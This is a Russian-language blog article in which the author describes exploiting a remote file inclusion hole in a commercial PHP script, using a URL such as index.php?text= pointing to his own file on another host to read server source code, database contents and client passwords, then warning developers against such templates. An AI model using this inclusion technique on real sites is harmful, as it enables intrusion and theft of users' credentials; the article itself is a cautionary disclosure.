RTFM! статьи, советы, скрипты
::Заработок с помощью сайта ::JScript по-русски! ::Все русские мануалы::
МЕНЮ
О САЙТЕ
НОВОСТИ
СТАТЬИ
КНИГИ
АППЛЕТЫ
СВЯЗЬ

СЧЕТЧИКИ
Rambler's Top100
Рейтинг@Mail.ru
Яндекс цитирования

Простые шаблоны - опасность хака

Автор: pauk Сайт: http://www.pauk2001.h1.ru/     Рейтинг: N/A из 7       <<НАЗАД
   
   
   Однажды я достал скрипт одного проекта, за который горе-разработчики просили 500 баксов:), и вот как...
   Зашел на официальный сайт. Смотрю,а люди эти "упростили" себе жизнь, они создали страницу - заголовок сверху/меню сбоку/счетчики внизу - стандарт. Ну а текст как всегда в центре.А сам текст они выводили таким способом:
   
   http://www.xxx.com/index.php?text=main
   
   и в контент вставлялся файл main.php и тд...
   И мне пришла в голову идея: создать на Народе сайт (там РНР не исполняется при вызове), а через ссылку типа
   
   http://www.xxx.com/index.php?text=http://xxx.narod.ru/myurl
   
   я вызвал файл myurl.php, и таким образом я узнал через show_source() код PHP-файлов на сервере (а еще говорят, такое невозможно :)) , мало того - я узнал таким способом содержимое базы и каталогов, получил возможность поменять все, узнал пароли и е-майлы клиентов (а соответственно и пароли е-майлов 50% клиентов - не секрет, что у половины везде один пароль).
   
   Все сделал я за 40-50 минут. Человек, обиженный на проект, таким образом может сильно навредить и админам, и простым клиентам. Как порядочный человек, написал я им письмо о дыре, и надо сказать, через 30 минут вышли в асю, и попросили не мешать продавать свои скрипты народу, обещают за молчание 1 (Один) доллар США на WebMoney заплатить :p
   
   Я не указываю страницу проекта, потому как "крутые " хакеры (кому мама-папа неделю назад книгу типа "РНР для придурков за 20 минут" купили) этим воспользуются, скажу только: таких страниц в сети очень много - людям не следует гнаться за легким :)
   
   Так что:
   1) Не используйте подобные "легкие" шаблоны - дорого может обойтись
   2) Будьте внимательны при покупке. 500 баксов стоил скрипт, а мне он обошелся около 10 рублей (время интернета)
   
   ЗЫ. Призываю не повторять мои действия для нанесения вреда!
   Во-первых, люди писали-старались все-таки, хоть и ручки кривые да пальцы кучерявые, но вредить им не рекомендую:D
   Во-вторых, на серверах ведутся логи, а причинение вреда - уголовно наказуемое деяние.
   
   ЗЫЗЫ. Если вы все-таки решили навредить, то сначала надобно научится заметать следы, а это тема для другого разговора. Все равно попадетесь, а потом не ссылайтесь на эту статью как на причину своих бед.
   


<<НАЗАД      ОЦЕНИТЬ СТАТЬЮ    ВЕРСИЯ ДЛЯ ПЕЧАТИ>>
Статья прочитана :  раз.




пейкюлю



 
 
 
 
 
pauk ©® 2000-2015. All rights reserved.
При перепечатке ссылка на сайт и указание обязательны.
Мнение администрации сайта не всегда совпадает с мнением автора.
Орфография и пунктуация - авторские.
Администрация не несет никакой ответственности за использование материалов.
.
Protected by Copyscape DMCA Takedown Notice Infringement Search Tool